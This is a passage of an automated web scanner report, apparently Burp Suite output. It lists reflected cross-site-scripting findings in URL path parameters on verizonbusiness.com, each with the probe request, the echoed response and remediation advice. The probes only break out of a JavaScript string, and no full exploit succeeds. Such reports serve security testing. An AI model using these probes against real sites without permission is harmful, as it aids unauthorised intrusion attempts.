Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/productivity9a3a8";34da4bb390d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.985. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d15b'%3b8b9c5e4a137 was submitted in the REST URL parameter 1. This input was echoed as 3d15b';8b9c5e4a137 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions3d15b'%3b8b9c5e4a137/bysolutions/professional/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Date: Wed, 17 Nov 2010 00:34:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions3d15b';8b9c5e4a137/bysolutions/professional/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.986. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7454e"%3bd726818009c was submitted in the REST URL parameter 1. This input was echoed as 7454e";d726818009c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions7454e"%3bd726818009c/bysolutions/professional/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:29 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions7454e";d726818009c/bysolutions/professional/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.987. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee867'%3b50b1f8f5204 was submitted in the REST URL parameter 2. This input was echoed as ee867';50b1f8f5204 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsee867'%3b50b1f8f5204/professional/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41882
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsee867';50b1f8f5204/professional/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.988. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8dc1a"%3bbb0222c97c3 was submitted in the REST URL parameter 2. This input was echoed as 8dc1a";bb0222c97c3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions8dc1a"%3bbb0222c97c3/professional/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41880
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions8dc1a";bb0222c97c3/professional/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.989. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f56a4"%3b1fe6f108021 was submitted in the REST URL parameter 3. This input was echoed as f56a4";1fe6f108021 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/professionalf56a4"%3b1fe6f108021/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/professionalf56a4";1fe6f108021/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.990. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5e12'%3b0c801a70782 was submitted in the REST URL parameter 3. This input was echoed as e5e12';0c801a70782 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/professionale5e12'%3b0c801a70782/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:10 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/professionale5e12';0c801a70782/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.991. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86481'%3b41a513cd807 was submitted in the REST URL parameter 1. This input was echoed as 86481';41a513cd807 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions86481'%3b41a513cd807/bysolutions/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:21 GMT
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions86481';41a513cd807/bysolutions/security/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.992. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e01"%3b3f1f49b2768 was submitted in the REST URL parameter 1. This input was echoed as 76e01";3f1f49b2768 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions76e01"%3b3f1f49b2768/bysolutions/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions76e01";3f1f49b2768/bysolutions/security/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM EL
...[SNIP]...

1.993. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 306a2"%3b962f8f31fa3 was submitted in the REST URL parameter 2. This input was echoed as 306a2";962f8f31fa3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions306a2"%3b962f8f31fa3/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41872
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions306a2";962f8f31fa3/security/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.994. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64073'%3b6a92efe90b0 was submitted in the REST URL parameter 2. This input was echoed as 64073';6a92efe90b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions64073'%3b6a92efe90b0/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:12 GMT
Content-Type: text/html
Content-Length: 41872
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions64073';6a92efe90b0/security/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.995. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1140f"%3b968eb2c6520 was submitted in the REST URL parameter 3. This input was echoed as 1140f";968eb2c6520 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/security1140f"%3b968eb2c6520/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:16 GMT
Content-Type: text/html
Content-Length: 43098
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/security1140f";968eb2c6520/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.996. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb1d2'%3b6837c788635 was submitted in the REST URL parameter 3. This input was echoed as cb1d2';6837c788635 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/securitycb1d2'%3b6837c788635/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:43 GMT
Content-Type: text/html
Content-Length: 43098
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/securitycb1d2';6837c788635/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.997. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83a8b'%3b3d94583d9e2 was submitted in the REST URL parameter 1. This input was echoed as 83a8b';3d94583d9e2 in the application's response.

